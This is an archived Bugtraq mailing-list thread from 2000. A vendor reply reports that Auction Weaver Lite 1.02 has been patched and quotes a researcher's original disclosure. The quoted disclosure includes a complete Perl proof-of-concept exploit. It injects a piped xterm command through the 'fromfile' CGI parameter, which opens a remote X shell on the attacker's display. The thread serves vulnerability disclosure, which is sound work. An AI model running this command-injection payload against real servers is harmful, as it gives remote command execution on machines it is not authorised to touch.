OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: More problems with Auction Weaver & CGI Script Center.
From: CGI Script Center Support (supportCGISCRIPTCENTER.COM)
Date: Sat Sep 02 2000 - 18:49:02 CDT


Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.

All files being opened for reading have now been updated.

> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.

No Professional version is yet available.

The below exploit should no longer be valid.

CGI Script Center Support
supportcgiscriptcenter.com

> -----Original Message-----
> From: teleh0r - [mailto:teleh0rdoglover.com]
> Sent: Wednesday, August 30, 2000 10:21 AM
> To: BUGTRAQSECURITYFOCUS.COM
> Cc: supportcgiscriptcenter.com
> Subject: More problems with Auction Weaver & CGI Script Center.
>
>
> CGI Script Center recently upgraded Auction Weaver 1.0 to
> 1.2 due to a security issue found and reported by Meliksah Ozoral.
>
> Today, I decided to take a look at Auction Weaver just to check
> if the issue and possible other security problems were now fixed.
>
> I guessed they had taken a *close* look at their scripts, considering
> the problems reported lately - but I guessed wrong...
>
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
>
> Or perhaps only those who pays gets secure scripts? Maybe that would
> be a successful business policy? ;)
>
> CGI Script Center, _please_ contact me if you want help securing your
> scripts.
>
> Sincerely yours,
> teleh0r
>
> 8<---auctionweaver-exploit.pl------------------------------------
>
>
> #!/usr/bin/perl -w
>
> ## Auction Weaver 1.02 / Only confirmed with LITE
> ## - Proof of Concept exploit -
> ##
> ## CGI Script Center have just released an update
> ## of Auction Weaver due to security reasons - I
> ## suggest that you spend some more time securing
> ## it, and the other scripts - It is really needed.
> ##
> ## This exploit will spawn a xterm from $target
> ## to $attacker.
> ##
> ## This exploit will not work on hosts running
> ## Auction Weaver on NT, due to the xterm call.
> ##
> ## CGI Script Center, please contact me if you need
> ## help with securing your scripts...
> ##
> ## teleh0rdoglover.com / anno 2000
> ## http://teleh0r.cjb.net
>
> use strict; use Socket;
>
> if (ARGV < 3) {
> print("Usage: $0 <target> <attacker> <dpy>\n");
> exit(1);
> }
>
> my($target,$attacker,$dpy,$length,$cgicode,
> $agent,$sploit,$iaddr,$paddr,$proto);
>
> ($target,$attacker,$dpy) = ARGV;
>
> if ($dpy !~ /\d/) {
> print("dpy must be a number, probably 0\n");
> exit(1);
> }
>
> print("\nRemote host: $target\n");
> print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
> print("Command: xterm -ut -display $attacker:$dpy\n\n");
>
> system("xhost + $target");
>
> $length = 138 + length($attacker.$dpy);
>
> $cgicode =
> "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1
> &catdir".
> "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem
> =1&sbut".
> "ton=BID";
>
> $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
>
> # The path to auctionweaver.pl may of course need to be changed.
>
> $sploit=
> "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
> Connection: close
> User-Agent: $agent
> Host: $target
> Content-type: application/x-www-form-urlencoded
> Content-length: $length
>
> $cgicode";
>
> $iaddr = inet_aton($target) || die("Error: $!\n");
> $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
> close(SOCKET);
>
> sleep(3);
> system("xhost - $target");
> print("\nAll done - hopefully you got the flying xterm!\n");
> exit(0)
>
>
> -----------------------------------------------------------------
>
>
> ______________________________________________
> FREE Personalized Email at Mail.com
> Sign up at http://www.mail.com/?sr=signup
>
>